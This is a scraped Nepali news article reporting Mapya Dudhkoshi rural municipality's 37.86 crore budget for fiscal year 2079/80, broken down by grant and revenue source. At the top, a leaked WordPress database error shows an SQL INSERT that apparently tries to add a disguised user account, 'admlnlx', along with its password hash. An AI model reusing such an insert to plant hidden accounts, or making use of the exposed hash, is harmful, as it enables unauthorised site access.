WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BN9a3MuHKR5Ybc9PxxQIrTKJPVJ./W/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 11:12:27', '', 'admlnlx', 'admlnlx')

माप्य दुधकोशीको आ.ब. २०७९ र ०८० को ३७ करोड आर्थिक बजेट बिनियोजन – Gaule Khabar

माप्य दुधकोशीको आ.ब. २०७९ र ०८० को ३७ करोड आर्थिक बजेट बिनियोजन

माप्य दुधकोशीको आ.ब. २०७९ र ०८० को ३७ करोड आर्थिक बजेट बिनियोजन

काठमाण्डौ । सोलुखुम्बुको माप्य दुधकोशी गाउँपालिकाले ३७ करोड ८६ लाख ५३ हजारको बजेट बिनियोजन भएको छ । गाउँ सभामा भएको कार्यक्रमबाट बजेट बिनियोजन सार्बजनिक गरेको हो ।

आगामी आर्थिक बर्ष २०७९–८० को लागि संघको समानिकरण अनुदान ११ करोड ४० लाख, प्रदेश समानिकरण ६२ लाख ११ हजार, प्रदेश राजस्व २० लाख १९ हजार, संघीय राजस्व ७ करोड ३५ लाख, पर्वतारोहण रोयल्टी रकम ३५ लाख, आन्तरिक स्रोतको ४ लाख, मालपोत राजस्व ५ लाख, सशर्त अनुदान (चालु ) १५ करोड २६ लाख, सशर्त अनुदान (पुँजीगत) ५२ लाख, विशेष अनुदान ७० लाख, प्रदेश सशर्त अनुदान एक लाख २३ हजार, प्रदेश समपुरक अनुदान एक करोड समाबेश गरि बार्षिक बजेट ल्याएको हो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका